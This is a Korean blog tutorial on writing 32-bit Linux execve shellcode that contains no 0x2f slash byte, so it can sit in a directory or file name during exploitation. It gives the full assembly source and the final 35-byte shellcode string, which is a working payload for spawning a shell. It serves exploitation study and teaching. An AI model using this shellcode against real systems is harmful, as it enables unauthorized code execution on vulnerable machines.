shellcode (0x2f 없애기)

지구 파괴범.. 다뿌셔 ><

 

간혹가다 디렉터리명/파일명에 쉘코드를 넣어놓고 argv[0]나 스택의 끝부분을 활용해야하는 상황이 있습니다.

우리가 만들어논 25byte 쉘코드로는 실행이 되지 않습니다.

왜 그럴까요?

 

 

 

 

0x2f때문인데요, 0x2f은 /(슬래쉬)로 디렉터리를 구분하는데 쓰이는 문자죠

물론 기존 쉘코드에 맞추어서 분리시키는 방법도 있겠네요,,, 생각만해도 귀찮,,,

...

0x2f

...

0x2f

...

 

 

 

 

이번 포스팅에서는 0x2f 없이 작동되는 쉘코드를 만들어볼까 합니다.

 

<2f_1>

 

 

문자열 "/bin//sh"를 넘겨주는 코드에서 0x2f가 포함되네요.

 

그럼 0x2f부분을 0x2e+1로 바꾸는 식으로 코딩을 해 봅시다.

 

<2f_2>

 

eax 레지스터를 통해 연산 수행 후 스택에 push 해줍니다.

코드는 잘 실행 됩니다.

 

 

정말 0x2f가 없어졌나 확인해봅시다.

 

<2f_3>

 

기존의 2f가 전부 없어졌음을 볼 수 있습니다.

shellcode로 뽑아내기 위해 null byte를 제거하여 최종 코드를 완성해 볼까요

 

 

<2f_4>

 

<2fbinsh.asm>

BITS 32

global _start

section .text
_start:
        xor eax, eax
        push eax
        mov eax, 0x68732e2e
        add ax, 0x101
        push eax
        mov eax, 0x6e69622e
        add al, 1
        push eax
        mov ebx, esp
        xor eax, eax
        push eax
        mov edx, esp
        push ebx
        mov ecx, esp
        mov al, 11
        int 0x80

 

 

 

 

0x101을 더하는 부분에서는 ax를, 0x1은 al을 사용하여 널바이트를 제어했습니다.

 

shellcode 로 뽑아낸 뒤, 사용해 봅시다.

 

<2f_5>

 

 

잘 적용 되네요

이렇게 0x2f없는 쉘코드를 만들어 보았습니다.

shellcode len : 35
\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80